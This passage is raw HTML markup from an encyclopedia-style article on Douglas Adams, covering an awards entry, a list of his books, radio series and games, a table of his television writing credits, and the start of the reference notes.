style=\"background:#B0C4DE;\">Year</th>\n<th style=\"background:#B0C4DE;\">Award</th>\n<th style=\"background:#B0C4DE;\">Work</th>\n<th style=\"background:#B0C4DE;\">Category</th>\n<th style=\"background:#B0C4DE;\">Result</th>\n<th style=\"background:#B0C4DE;\">Reference</th>\n</tr>\n<tr>\n<td>1979</td>\n<td><a href=\"/wiki/Hugo_Award\" title=\"Hugo Award\">Hugo Award</a></td>\n<td><i><a href=\"/wiki/The_Hitchhiker%27s_Guide_to_the_Galaxy_(radio_series)\" title=\"The Hitchhiker's Guide to the Galaxy (radio series)\">The Hitchhiker's Guide to the Galaxy</a></i><small>(shared with <a href=\"/wiki/Geoffrey_Perkins\" title=\"Geoffrey Perkins\">Geoffrey Perkins</a>)</small></td>\n<td><a href=\"/wiki/Hugo_Award_for_Best_Dramatic_Presentation\" title=\"Hugo Award for Best Dramatic Presentation\">Best Dramatic Presentation</a></td>\n<td style=\"background: #FDD; color: black; vertical-align: middle; text-align: center;\" class=\"no table-no2\">Nominated</td>\n<td></td>\n</tr>\n</table>\n<h2><span class=\"mw-headline\" id=\"Works\">Works</span></h2>\n<div class=\"refbegin columns references-column-width\" style=\"-moz-column-width: 20em; -webkit-column-width: 20em; column-width: 20em;\">\n<ul>\n<li><i><a href=\"/wiki/The_Private_Life_of_Genghis_Khan\" title=\"The Private Life of Genghis Khan\">The Private Life of Genghis Khan</a></i> (1975), based on a comedy sketch Adams co-wrote with <a href=\"/wiki/Graham_Chapman\" title=\"Graham Chapman\">Graham Chapman</a> (short story)</li>\n<li><i><a href=\"/wiki/The_Hitchhiker%27s_Guide_to_the_Galaxy_(radio_series)\" title=\"The Hitchhiker's Guide to the Galaxy (radio series)\">The Hitchhiker's Guide to the Galaxy</a></i> (1978) (radio series)</li>\n<li><i><a href=\"/wiki/The_Hitchhiker%27s_Guide_to_the_Galaxy_(book)\" class=\"mw-redirect\" title=\"The Hitchhiker's Guide to the Galaxy (book)\">The Hitchhiker's Guide to the Galaxy</a></i> (1979) (novel)</li>\n<li><i><a href=\"/wiki/Shada\" class=\"mw-redirect\" title=\"Shada\">Shada</a></i> (1979–1980), a Doctor Who serial</li>\n<li><i><a href=\"/wiki/The_Restaurant_at_the_End_of_the_Universe\" title=\"The Restaurant at the End of the Universe\">The Restaurant at the End of the Universe</a></i> (1980) (novel)</li>\n<li><i><a href=\"/wiki/Life,_the_Universe_and_Everything\" title=\"Life, the Universe and Everything\">Life, the Universe and Everything</a></i> (1982) (novel)</li>\n<li><i><a href=\"/wiki/The_Meaning_of_Liff\" title=\"The Meaning of Liff\">The Meaning of Liff</a></i> (1983 (book), with <a href=\"/wiki/John_Lloyd_(producer)\" title=\"John Lloyd (producer)\">John Lloyd</a>)</li>\n<li><i><a href=\"/wiki/So_Long,_and_Thanks_for_All_the_Fish\" title=\"So Long, and Thanks for All the Fish\">So Long, and Thanks for All the Fish</a></i> (1984) (novel)</li>\n<li><i><a href=\"/wiki/The_Hitchhiker%27s_Guide_to_the_Galaxy_(computer_game)\" class=\"mw-redirect\" title=\"The Hitchhiker's Guide to the Galaxy (computer game)\">The Hitchhiker's Guide to the Galaxy</a></i> (1984, with <a href=\"/wiki/Steve_Meretzky\" title=\"Steve Meretzky\">Steve Meretzky</a>) (computer game)</li>\n<li><i><a href=\"/wiki/The_Hitchhiker%27s_Guide_to_the_Galaxy:_The_Original_Radio_Scripts\" title=\"The Hitchhiker's Guide to the Galaxy: The Original Radio Scripts\">The Hitchhiker's Guide to the Galaxy: The Original Radio Scripts</a></i> (1985, with <a href=\"/wiki/Geoffrey_Perkins\" title=\"Geoffrey Perkins\">Geoffrey Perkins</a>)</li>\n<li><i><a href=\"/wiki/Young_Zaphod_Plays_It_Safe\" title=\"Young Zaphod Plays It Safe\">Young Zaphod Plays It Safe</a> (short story)</i> (1986)</li>\n<li><i><a href=\"/w/index.php?title=A_Christmas_Fairly_Story&action=edit&redlink=1\" class=\"new\" title=\"A Christmas Fairly Story (page does not exist)\">A Christmas Fairly Story</a></i> [<i><a href=\"/wiki/Sic\" title=\"Sic\">sic</a></i>] (1986, with <a href=\"/wiki/Terry_Jones\" title=\"Terry Jones\">Terry Jones</a>), and</li>\n<li><i>Supplement to The Meaning of Liff</i> (1986, with <a href=\"/wiki/John_Lloyd_(producer)\" title=\"John Lloyd (producer)\">John Lloyd</a> and <a href=\"/wiki/Stephen_Fry\" title=\"Stephen Fry\">Stephen Fry</a>), both part of\n<ul>\n<li><i><a href=\"/wiki/The_Utterly_Utterly_Merry_Comic_Relief_Christmas_Book\" title=\"The Utterly Utterly Merry Comic Relief Christmas Book\">The Utterly Utterly Merry Comic Relief Christmas Book</a></i> (1986, edited with <a href=\"/wiki/Peter_Fincham\" title=\"Peter Fincham\">Peter Fincham</a>)</li>\n</ul>\n</li>\n<li><i><a href=\"/wiki/Bureaucracy_(computer_game)\" class=\"mw-redirect\" title=\"Bureaucracy (computer game)\">Bureaucracy</a></i> (1987) (computer game)</li>\n<li><i><a href=\"/wiki/Dirk_Gently%27s_Holistic_Detective_Agency\" title=\"Dirk Gently's Holistic Detective Agency\">Dirk Gently's Holistic Detective Agency</a></i> (1987) (novel)</li>\n<li><i><a href=\"/wiki/The_Long_Dark_Tea-Time_of_the_Soul\" title=\"The Long Dark Tea-Time of the Soul\">The Long Dark Tea-Time of the Soul</a></i> (1988) (novel)</li>\n<li><i><a href=\"/wiki/The_Deeper_Meaning_of_Liff\" class=\"mw-redirect\" title=\"The Deeper Meaning of Liff\">The Deeper Meaning of Liff</a></i> (1990, with <a href=\"/wiki/John_Lloyd_(producer)\" title=\"John Lloyd (producer)\">John Lloyd</a>)</li>\n<li><i><a href=\"/wiki/Last_Chance_to_See\" title=\"Last Chance to See\">Last Chance to See</a></i> (1990, with <a href=\"/wiki/Mark_Carwardine\" title=\"Mark Carwardine\">Mark Carwardine</a>) (book)</li>\n<li><i><a href=\"/wiki/Mostly_Harmless\" title=\"Mostly Harmless\">Mostly Harmless</a></i> (1992) (novel)</li>\n<li><i><a href=\"/wiki/The_Hitchhiker%27s_Guide_to_the_Galaxy_(book)#Illustrated_edition\" class=\"mw-redirect\" title=\"The Hitchhiker's Guide to the Galaxy (book)\">The Illustrated Hitchhiker's Guide to the Galaxy</a></i> (1994)</li>\n<li><i><a href=\"/wiki/Douglas_Adams%27s_Starship_Titanic\" class=\"mw-redirect\" title=\"Douglas Adams's Starship Titanic\">Douglas Adams's Starship Titanic</a></i> (1997), written by <a href=\"/wiki/Terry_Jones\" title=\"Terry Jones\">Terry Jones</a>, based on an idea by Adams</li>\n<li><i><a href=\"/wiki/Starship_Titanic\" title=\"Starship Titanic\">Starship Titanic</a></i> (computer game) (1998)</li>\n<li><i><a href=\"/wiki/H2g2\" title=\"H2g2\">h2g2</a></i> (internet project) (1999)</li>\n<li><i>The Internet: The Last Battleground of the 20th century</i> (radio series) (2000)</li>\n<li><i><a href=\"/wiki/The_Hitchhiker%27s_Guide_to_the_Future\" title=\"The Hitchhiker's Guide to the Future\">The Hitchhiker's Guide to the Future</a></i> (radio series) (2001) final project for <a href=\"/wiki/BBC_Radio_4\" title=\"BBC Radio 4\">BBC Radio 4</a> before his death</li>\n<li><i><a rel=\"nofollow\" class=\"external text\" href=\"https://www.youtube.com/watch?v=_ZG8HBuDjgc\">Parrots, the universe and everything</a></i> (2001)</li>\n<li><i><a href=\"/wiki/The_Salmon_of_Doubt\" title=\"The Salmon of Doubt\">The Salmon of Doubt</a></i> (2002), unfinished novel manuscript (11 chapters), short stories, essays, and interviews (also available as an audiobook, read by <a href=\"/wiki/Simon_Jones_(actor)\" title=\"Simon Jones (actor)\">Simon Jones</a>)</li>\n<li><i><a href=\"/wiki/The_Hitchhiker%27s_Guide_to_the_Galaxy_(film)\" title=\"The Hitchhiker's Guide to the Galaxy (film)\">The Hitchhiker's Guide to the Galaxy</a></i> (2005) (film)</li>\n</ul>\n</div>\n<h2><span class=\"mw-headline\" id=\"Writing_credits\">Writing credits</span></h2>\n<table class=\"wikitable\">\n<tr style=\"background:#ccc; text-align:center;\">\n<th>Production</th>\n<th>Notes</th>\n<th>Broadcaster</th>\n</tr>\n<tr>\n<td><i><a href=\"/wiki/Monty_Python%27s_Flying_Circus\" title=\"Monty Python's Flying Circus\">Monty Python's Flying Circus</a></i></td>\n<td>\n<ul>\n<li>\"<a href=\"/wiki/List_of_Monty_Python%27s_Flying_Circus_episodes#6._Party_Political_Broadcast\" title=\"List of Monty Python's Flying Circus episodes\">Party Political Broadcast on Behalf of the Liberal Party</a>\" (1974)</li>\n</ul>\n</td>\n<td><a href=\"/wiki/BBC_Two\" title=\"BBC Two\">BBC Two</a></td>\n</tr>\n<tr>\n<td><i><a href=\"/wiki/Out_of_the_Trees\" title=\"Out of the Trees\">Out of the Trees</a></i></td>\n<td>\n<ul>\n<li>Television pilot (1976)</li>\n</ul>\n</td>\n<td>BBC Two</td>\n</tr>\n<tr>\n<td><i><a href=\"/wiki/Doctor_on_the_Go\" title=\"Doctor on the Go\">Doctor on the Go</a></i></td>\n<td>\n<ul>\n<li>\"For Your Own Good\" (1977)</li>\n</ul>\n</td>\n<td><a href=\"/wiki/ITV_(TV_network)\" title=\"ITV (TV network)\">ITV</a></td>\n</tr>\n<tr>\n<td><i><a href=\"/wiki/Doctor_Who\" title=\"Doctor Who\">Doctor Who</a></i></td>\n<td>\n<p>5 episodes (1978-1979, 1983):</p>\n<ul>\n<li>\"<a href=\"/wiki/The_Pirate_Planet\" title=\"The Pirate Planet\">The Pirate Planet</a>\" (1978)</li>\n<li>\"<a href=\"/wiki/Destiny_of_the_Daleks\" title=\"Destiny of the Daleks\">Destiny of the Daleks</a>\" (1979) (uncredited)</li>\n<li>\"<a href=\"/wiki/City_of_Death\" title=\"City of Death\">City of Death</a>\" (co-written with <a href=\"/wiki/Graham_Williams_(television_producer)\" title=\"Graham Williams (television producer)\">Graham Williams</a>, 1979)</li>\n<li>\"<a href=\"/wiki/The_Five_Doctors\" title=\"The Five Doctors\">The Five Doctors</a>\" (1983) (<a href=\"/wiki/Shada\" class=\"mw-redirect\" title=\"Shada\">Shada</a> segments; uncredited)</li>\n</ul>\n</td>\n<td><a href=\"/wiki/BBC_One\" title=\"BBC One\">BBC One</a></td>\n</tr>\n<tr>\n<td><i><a href=\"/wiki/Doctor_Snuggles\" title=\"Doctor Snuggles\">Doctor Snuggles</a></i></td>\n<td>\n<ul>\n<li>\"The Great Disappearing Mystery\" (1979)</li>\n<li>\"The Remarkable Fidgety River\" (1979)</li>\n</ul>\n</td>\n<td>ITV</td>\n</tr>\n<tr>\n<td><i><a href=\"/wiki/Not_the_Nine_O%27Clock_News\" title=\"Not the Nine O'Clock News\">Not the Nine O'Clock News</a></i></td>\n<td>\n<ul>\n<li>Unknown episodes (1979)</li>\n</ul>\n</td>\n<td>BBC Two</td>\n</tr>\n<tr>\n<td><i><a href=\"/wiki/The_Hitchhiker%27s_Guide_to_the_Galaxy_(TV_series)\" title=\"The Hitchhiker's Guide to the Galaxy (TV series)\">The Hitchhiker's Guide to the Galaxy</a></i></td>\n<td>\n<ul>\n<li>6 episodes (1981)</li>\n</ul>\n</td>\n<td>BBC Two</td>\n</tr>\n<tr>\n<td><i><a href=\"/wiki/Hyperland\" title=\"Hyperland\">Hyperland</a></i></td>\n<td>\n<ul>\n<li>Television documentary (1990)</li>\n</ul>\n</td>\n<td>BBC Two</td>\n</tr>\n</table>\n<h2><span class=\"mw-headline\" id=\"Notes\">Notes</span></h2>\n<div class=\"reflist columns references-column-width\" style=\"-moz-column-width: 30em; -webkit-column-width: 30em; column-width: 30em; list-style-type: decimal;\">\n<ol class=\"references\">\n<li id=\"cite_note-radioacad-1\"><span class=\"mw-cite-backlink\"><b><a href=\"#cite_ref-radioacad_1-0\">^</a></b></span> <span class=\"reference-text\"><cite class=\"citation web\"><a rel=\"nofollow\" class=\"external text\" href=\"http://www.radioacademy.org/hall-of-fame\">\"The Radio Academy Hall of Fame\"</a>. <i>The Radio Academy</i>. <a rel=\"nofollow\" class=\"external text\" href=\"http://www.webcitation.org/63mNGrql2?url=http%3A%2F%2Fwww.radioacademy.org%2Fhall-of-fame%2F\">Archived</a> from the original on 8 December 2011<span class=\"reference-accessdate\">. Retrieved <span class=\"nowrap\">8 December</span> 2011</span>.</cite><span title=\"ctx_ver=Z39.88-2004&rfr_id=info%3Asid%2Fen.wikipedia.org%3ADouglas+Adams&rft.atitle=The+Radio+Academy+Hall+of+Fame&rft.genre=unknown&rft_id=http%3A%2F%2Fwww.radioacademy.org%2Fhall-of-fame&rft.jtitle=The+Radio+Academy&rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal\" class=\"Z3988\"><span style=\"display:none;\"> </span></span></span></li>\n<li id=\"cite_note-ODNB-2\"><span class=\"mw-cite-backlink\">^ <a href=\"#cite_ref-ODNB_2-0\"><sup><i><b>a</b></i></sup></a> <a href=\"#cite_ref-ODNB_2-1\"><sup><i><b>b</b></i></sup></a> <a href=\"#cite_ref-ODNB_2-2\"><sup><i><b>c</b></i></sup></a> <a href=\"#cite_ref-ODNB_2-3\"><sup><i><b>d</b></i></sup></a></span> <span class=\"reference-text\">Webb 2005b</span></li>\n<li id=\"cite_note-Adams_xix-3\"><span class=\"mw-cite-backlink\">^ <a href=\"#cite_ref-Adams_xix_3-0\"><sup><i><b>a</b></i></sup></a> <a href=\"#cite_ref-Adams_xix_3-1\"><sup><i><b>b</b></i></sup></a></span> <span class=\"reference-text\"><a href=\"#CITEREFAdams2002\">Adams 2002</a>, pp. xix</span></li>\n<li id=\"cite_note-4\"><span class=\"mw-cite-backlink\"><b><a href=\"#cite_ref-4\">^</a></b></span> <span class=\"reference-text\">Webb 2005a, p. 32.</span></li>\n<li id=\"cite_note-Adams_7-5\"><span class=\"mw-cite-backlink\"><b><a href=\"#cite_ref-Adams_7_5-0\">^</a></b></span> <span class=\"reference-text\"><a href=\"#CITEREFAdams2002\">Adams 2002</a>, pp. 7</span></li>\n<li id=\"cite_note-6\"><span class=\"mw-cite-backlink\"><b><a href=\"#cite_ref-6\">^</a></b></span> <span class=\"reference-text\">Botti, Nicholas. <a rel=\"nofollow\" class=\"external text\" href=\"http://douglasadams.eu/interview-with-frank-halford/\">\"Interview with Frank Halford\"</a>. <i>Life, DNA, and H2G2.</i> 2009. Web. Retrieved 13 March 2012. (Click on link at bottom for facsimile page from <i>Daily News</i> article, 7 March 1998.)</span></li>\n<li id=\"cite_note-Simpson_9-7\"><span class=\"mw-cite-backlink\"><b><a href=\"#cite_ref-Simpson_9_7-0\">^</a></b></span> <span class=\"reference-text\"><a href=\"#CITEREFSimpson2003\">Simpson 2003</a>, pp. 9</span></li>\n<li id=\"cite_note-8\"><span class=\"mw-cite-backlink\"><b><a href=\"#cite_ref-8\">^</a></b></span> <span class=\"reference-text\">Flood, Alison (March 2014). <a rel=\"nofollow\" class=\"external text\" href=\"http://www.theguardian.com/books/2014/mar/19/lost-school-poems-douglas-adams-griff-rhys-jones\">\"Lost poems of Douglas Adams and Griff Rhys Jones found in school cupboard\"</a>, <i>The Guardian</i>, 19 March 2014. Accessed 2 July 2014</span></li>\n<li id=\"cite_note-Simpson_30-40-9\"><span class=\"mw-cite-backlink\"><b><a href=\"#cite_ref-Simpson_30-40_9-0\">^</a></b></span> <span class=\"reference-text\"><a href=\"#CITEREFSimpson2003\">Simpson 2003</a>, pp. 30–40</span></li>\n<li id=\"cite_note-times-10\"><span class=\"mw-cite-backlink\"><b><a href=\"#cite_ref-times_10-0\">^</a></b></span> <span class=\"reference-text\"><cite class=\"citation news\">\"Terry Jones remembers Douglas Adams, 'the last of the Pythons<span style=\"padding-right:0.2em;\">'</span>\". <i>The Times</i>. 10 October 2009.</cite><span title=\"ctx_ver=Z39.88-2004&rfr_id=info%3Asid%2Fen.wikipedia.org%3ADouglas+Adams&rft.atitle=Terry+Jones+remembers+Douglas+Adams%2C+%27the+last+of+the+Pythons%27&rft.date=2009-10-10&rft.genre=article&rft.jtitle=The+Times&rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal\" class=\"Z3988\"><span style=\"display:none;\"> </span></span></span></li>\n<li id=\"cite_note-11\"><span class=\"mw-cite-backlink\"><b><a href=\"#cite_ref-11\">^</a></b></span> <span class=\"reference-text\">Webb 2005a, p. 93.</span></li>\n<li id=\"cite_note-Adams_prologue-12\"><span class=\"mw-cite-backlink\"><b><a href=\"#cite_ref-Adams_prologue_12-0\">^</a></b></span> <span class=\"reference-text\"><a href=\"#CITEREFAdams2002\">Adams 2002</a>, pp. prologue</span></li>\n<li id=\"cite_note-13\"><span class=\"mw-cite-backlink\"><b><a href=\"#cite_ref-13\">^</a></b></span> <span class=\"reference-text\"><i>Hitchhiker: A Biography of Douglas Adams</i> by M. J. Simpson, p87</span></li>\n<li id=\"cite_note-14\"><span class=\"mw-cite-backlink\"><b><a href=\"#cite_ref-14\">^</a></b></span> <span class=\"reference-text\">Roberts, Jem. <i>The Clue Bible: The Fully Authorised History of I'm Sorry I Haven't A Clue from Footlights to Mornington Crescent</i>: London, 2009, p164-5</span></li>\n<li id=\"cite_note-15\"><span class=\"mw-cite-backlink\"><b><a href=\"#cite_ref-15\">^</a></b></span> <span class=\"reference-text\"><cite class=\"citation book\">Adams, Douglas (2003). Geoffrey Perkins (ed.), Additional Material by M. J. Simpson, ed. <i><a href=\"/wiki/The_Hitchhiker%27s_Guide_to_the_Galaxy:_The_Original_Radio_Scripts\" title=\"The Hitchhiker's Guide to the Galaxy: The Original Radio Scripts\">The Hitchhiker's Guide to the Galaxy: The Original Radio Scripts</a></i> (25th Anniversary ed.). Pan Books. p. 10. <a href=\"/wiki/International_Standard_Book_Number\" title=\"International Standard Book Number\">ISBN</a> <a href=\"/wiki/Special:BookSources/0-330-41957-9\" title=\"Special:BookSources/0-330-41957-9\">0-330-41957-9</a>.</cite><span title=\"ctx_ver=Z39.88-2004&rfr_id=info%3Asid%2Fen.wikipedia.org%3ADouglas+Adams&rft.au=Adams%2C+Douglas&rft.btitle=The+Hitchhiker%27s+Guide+to+the+Galaxy%3A+The+Original+Radio+Scripts&rft.date=2003&rft.edition=25th+Anniversary&rft.genre=book&rft.isbn=0-330-41957-9&rft.pages=10&rft.pub=Pan+Books&rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook\" class=\"Z3988\"><span style=\"display:none;\"> </span></span></span></li>\n<li id=\"cite_note-16\"><span class=\"mw-cite-backlink\"><b><a href=\"#cite_ref-16\">^</a></b></span> <span class=\"reference-text\">Webb 2005a, p. 120.</span></li>\n<li id=\"cite_note-17\"><span class=\"mw-cite-backlink\"><b><a href=\"#cite_ref-17\">^</a></b></span> <span class=\"reference-text\">Felch 2004</span></li>\n<li id=\"cite_note-Simpson_236-18\"><span class=\"mw-cite-backlink\"><b><a href=\"#cite_ref-Simpson_236_18-0\">^</a></b></span> <span class=\"reference-text\"><a href=\"#CITEREFSimpson2003\">Simpson 2003</a>, pp. 236</span></li>\n<li id=\"cite_note-19\"><span class=\"mw-cite-backlink\"><b><a href=\"#cite_ref-19\">^</a></b></span> <span class=\"reference-text\"><a rel=\"nofollow\" class=\"external text\" href=\"http://www.iblist.com/series.php?id=2\">Internet Book List</a> page, with links to all five novels, and reproductions of the 1990s paperback covers that included the <a href=\"/wiki/42_Puzzle\" class=\"mw-redirect\" title=\"42 Puzzle\">42 Puzzle</a>.</span></li>\n<li id=\"cite_note-20\"><span class=\"mw-cite-backlink\"><b><a href=\"#cite_ref-20\">^</a></b></span> <span class=\"reference-text\"><cite class=\"citation\"><a rel=\"nofollow\" class=\"external text\" href=\"http://www.imdb.com/title/tt0081874/\">The Hitch Hiker's Guide to the Galaxy</a>, Internet Movie Database</cite><span title=\"ctx_ver=Z39.88-2004&rfr_id=info%3Asid%2Fen.wikipedia.org%3ADouglas+Adams&rft.btitle=The+Hitch+Hiker%27s+Guide+to+the+Galaxy&rft.genre=book&rft_id=http%3A%2F%2Fwww.imdb.com%2Ftitle%2Ftt0081874%2F&rft.pub=Internet+Movie+Database&rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook\" class=\"Z3988\"><span style=\"display:none;\"> </span></span></span></li>\n<li id=\"cite_note-21\"><span class=\"mw-cite-backlink\"><b><a href=\"#cite_ref-21\">^</a></b></span> <span class=\"reference-text\"><cite class=\"citation book\">Adams, Douglas. (2005). <a href=\"/wiki/Dirk_Maggs\" title=\"Dirk Maggs\">Dirk Maggs</a>, dramatisations and editor, ed. <i>The Hitchhiker's Guide to the Galaxy Radio Scripts: The Tertiary, Quandary and Quintessential Phases</i>. Pan Books. xiv. <a href=\"/wiki/International_Standard_Book_Number\" title=\"International Standard Book Number\">ISBN</a> <a href=\"/wiki/Special:BookSources/0-330-43510-8\" title=\"Special:BookSources/0-330-43510-8\">0-330-43510-8</a>.</cite><span title=\"ctx_ver=Z39.88-2004&rfr_id=info%3Asid%2Fen.wikipedia.org%3ADouglas+Adams&rft.au=Adams%2C+Douglas.&rft.btitle=The+Hitchhiker%27s+Guide+to+the+Galaxy+Radio+Scripts%3A+The+Tertiary%2C+Quandary+and+Quintessential+Phases&rft.date=2005&rft.genre=book&rft.isbn=0-330-43510-8&rft.pages=xiv&rft.pub=Pan+Books&rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook\" class=\"Z3988\"><span style=\"display:none;\"> </span></span></span></li>\n<li id=\"cite_note-22\"><span class=\"mw-cite-backlink\"><b><a href=\"#cite_ref-22\">^</a></b></span> <span class=\"reference-text\">Adams, <i>Dirk Maggs</i>, Page 356.</span></li>\n<li id=\"cite_note-23\"><span class=\"mw-cite-backlink\"><b><a href=\"#cite_ref-23\">^</a></b></span> <span class=\"reference-text\"><cite class=\"citation book\"><a href=\"/wiki/Neil_Gaiman\" title=\"Neil Gaiman\">Gaiman, Neil</a> (2003). <i>Don't Panic: Douglas Adams & The Hitchhiker's Guide to the Galaxy</i> (Second U.S. ed.). Titan Books. p. 169. <a href=\"/wiki/International_Standard_Book_Number\" title=\"International Standard Book Number\">ISBN</a> <a href=\"/wiki/Special:BookSources/1-84023-742-2\" title=\"Special:BookSources/1-84023-742-2\">1-84023-742-2</a>.</cite><span title=\"ctx_ver=Z39.88-2004&rfr_id=info%3Asid%2Fen.wikipedia.org%3ADouglas+Adams&rft.au=Gaiman%2C+Neil&rft.btitle=Don%27t+Panic%3A+Douglas+Adams+%26+The+Hitchhiker%27s+Guide+to+the+Galaxy&rft.date=2003&rft.edition=Second+U.S.&rft.genre=book&rft.isbn=1-84023-742-2&rft.pages=169&rft.pub=Titan+Books&rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook\" class=\"Z3988\"><span style=\"display:none;\"> </span></span></span></li>\n<li id=\"cite_note-24\"><span class=\"mw-cite-backlink\"><b><a href=\"#cite_ref-24\">^</a></b></span> <span class=\"reference-text\"><cite class=\"citation web\"><a rel=\"nofollow\" class=\"external text\" href=\"http://www.skepticfiles.org/en001/drwhogde.htm\">\"A 1990s Doctor Who FAQ\"</a>. Skepticfiles.org<span class=\"reference-accessdate\">. Retrieved <span class=\"nowrap\">11 March</span> 2013</span>.</cite><span title=\"ctx_ver=Z39.88-2004&rfr_id=info%3Asid%2Fen.wikipedia.org%3ADouglas+Adams&rft.btitle=A+1990s+Doctor+Who+FAQ&rft.genre=unknown&rft_id=http%3A%2F%2Fwww.skepticfiles.org%2Fen001%2Fdrwhogde.htm&rft.pub=Skepticfiles.org&rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook\" class=\"Z3988\"><span style=\"display:none;\"> </span></span></span></li>\n<li id=\"cite_note-25\"><span class=\"mw-cite-backlink\"><b><a href=\"#cite_ref-25\">^</a></b></span> <span class=\"reference-text\"><cite class=\"citation web\">Moffat, Steven (24 December 2012). <a rel=\"nofollow\" class=\"external text\" href=\"http://www.radiotimes.com/news/2012-12-24/doctor-who-christmas-special-steven-moffat-matt-smith-and-jenna-louise-coleman-reveal-all\">\"Doctor Who Christmas special: Steven Moffat, Matt Smith and Jenna-Louise Coleman reveal all\"</a>. <i>Radio Times</i><span class=\"reference-accessdate\">. Retrieved <span class=\"nowrap\">8 July</span> 2013</span>.</cite><span title=\"ctx_ver=Z39.88-2004&rfr_id=info%3Asid%2Fen.wikipedia.org%3ADouglas+Adams&rft.atitle=Doctor+Who+Christmas+special%3A+Steven+Moffat%2C+Matt+Smith+and+Jenna-Louise+Coleman+reveal+all&rft.aufirst=Steven&rft.aulast=Moffat&rft.date=2012-12-24&rft.genre=unknown&rft_id=http%3A%2F%2Fwww.radiotimes.com%2Fnews%2F2012-12-24%2Fdoctor-who-christmas-special-steven-moffat-matt-smith-and-jenna-louise-coleman-reveal-all&rft.jtitle=Radio+Times&rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal\" class=\"Z3988\"><span style=\"display:none;\"> </span></span></span></li>\n<li id=\"cite_note-Adams_xx-26\"><span class=\"mw-cite-backlink\"><b><a href=\"#cite_ref-Adams_xx_26-0\">^</a></b></span> <span class=\"reference-text\"><a href=\"#CITEREFAdams2002\">Adams 2002</a>, pp. xx</span></li>\n<li id=\"cite_note-27\"><span class=\"mw-cite-backlink\"><b><a href=\"#cite_ref-27\">^</a></b></span> <span class=\"reference-text\">Webb, page 49.</span></li>\n<li id=\"cite_note-Mabbett-MM-28\"><span class=\"mw-cite-backlink\">^ <a href=\"#cite_ref-Mabbett-MM_28-0\"><sup><i><b>a</b></i></sup></a> <a href=\"#cite_ref-Mabbett-MM_28-1\"><sup><i><b>b</b></i></sup></a></span> <span class=\"reference-text\"><cite class=\"citation book\">Mabbett, Andy (2010). <i>Pink Floyd – The Music and the Mystery</i>. London: Omnibus Press. <a href=\"/wiki/International_Standard_Book_Number\" title=\"International Standard Book Number\">ISBN</a> <a href=\"/wiki/Special:BookSources/978-1-84938-370-7\" title=\"Special:BookSources/978-1-84938-370-7\">978-1-84938-370-7</a>.</cite><span title=\"ctx_ver=Z39.88-2004&rfr_id=info%3Asid%2Fen.wikipedia.org%3ADouglas+Adams&rft.aufirst=Andy&rft.aulast=Mabbett&rft.btitle=Pink+Floyd+%93+The+Music+and+the+Mystery&rft.date=2010&rft.genre=book&rft.isbn=978-1-84938-370-7&rft.place=London&rft.pub=Omnibus+Press&rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook\" class=\"Z3988\"><span style=\"display:none;\"> </span></span></span></li>\n<li id=\"cite_note-29\"><span class=\"mw-cite-backlink\"><b><a href=\"#cite_ref-29\">^</a></b></span> <span class=\"reference-text\"><cite class=\"citation web\">Adams, Douglas (8 February 1996). <a rel=\"nofollow\" class=\"external text\" href=\"http://www.procolharum.com/dadams.htm\">\"Text of one of Douglas Adams's introductions of Procol Harum in concert\"</a><span class=\"reference-accessdate\">. Retrieved <span class=\"nowrap\">21 August</span> 2006</span>.</cite><span title=\"ctx_ver=Z39.88-2004&rfr_id=info%3Asid%2Fen.wikipedia.org%3ADouglas+Adams&rft.aufirst=Douglas&rft.aulast=Adams&rft.btitle=Text+of+one+of+Douglas+Adams%27s+introductions+of+Procol+Harum+in+concert&rft.date=1996-02-08&rft.genre=unknown&rft_id=http%3A%2F%2Fwww.procolharum.com%2Fdadams.htm&rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook\" class=\"Z3988\"><span style=\"display:none;\"> </span></span></span></li>\n<li id=\"cite_note-bbc.co.uk-30\"><span class=\"mw-cite-backlink\">^ <a href=\"#cite_ref-bbc.co.uk_30-0\"><sup><i><b>a</b></i></sup></a> <a href=\"#cite_ref-bbc.co.uk_30-1\"><sup><i><b>b</b></i></sup></a></span> <span class=\"reference-text\">BBC Online (no date) <a rel=\"nofollow\" class=\"external text\" href=\"http://www.bbc.co.uk/cult/hitchhikers/dna/biog.shtml\">\"The Hitchhiker's Guide to the Galaxy: DNA (1952-2001)\"</a> Accessed 9 July 2014</span></li>\n<li id=\"cite_note-31\"><span class=\"mw-cite-backlink\"><b><a href=\"#cite_ref-31\">^</a></b></span> <span class=\"reference-text\">Botti, Nicolas (2009). <a rel=\"nofollow\" class=\"external text\" href=\"http://www.douglasadams.eu/en_adams_bio.php\">\"Life, DNA & h2g2: Douglas Adams's Biography\"</a> Accessed 9 July 2014</span></li>\n<li id=\"cite_note-32\"><span class=\"mw-cite-backlink\"><b><a href=\"#cite_ref-32\">^</a></b></span> <span class=\"reference-text\"><a rel=\"nofollow\" class=\"external text\" href=\"http://www.imdb.com/title/tt0188677/\">Internet Movie Database's page for <i>Hyperland</i></a></span></li>\n<li id=\"cite_note-33\"><span class=\"mw-cite-backlink\"><b><a href=\"#cite_ref-33\">^</a></b></span> <span class=\"reference-text\">Adams 1998.</span></li>\n<li id=\"cite_note-amath-34\"><span class=\"mw-cite-backlink\"><b><a href=\"#cite_ref-amath_34-0\">^</a></b></span> <span class=\"reference-text\"><cite class=\"citation journal\">Silverman, Dave (1998–1999). <a rel=\"nofollow\" class=\"external text\" href=\"http://www.atheists.org/Interview%3A__Douglas_Adams\">\"Interview: Douglas Adams\"</a>. <i>American Atheist</i>. <b>37</b> (1). <a rel=\"nofollow\" class=\"external text\" href=\"http://www.webcitation.org/63mRFcWVO?url=http%3A%2F%2Fwww.atheists.org%2FInterview%253A__Douglas_Adams\">Archived</a> from the original on 8 December 2011<span class=\"reference-accessdate\">. Retrieved <span class=\"nowrap\">16 August</span> 2009</span>.</cite><span 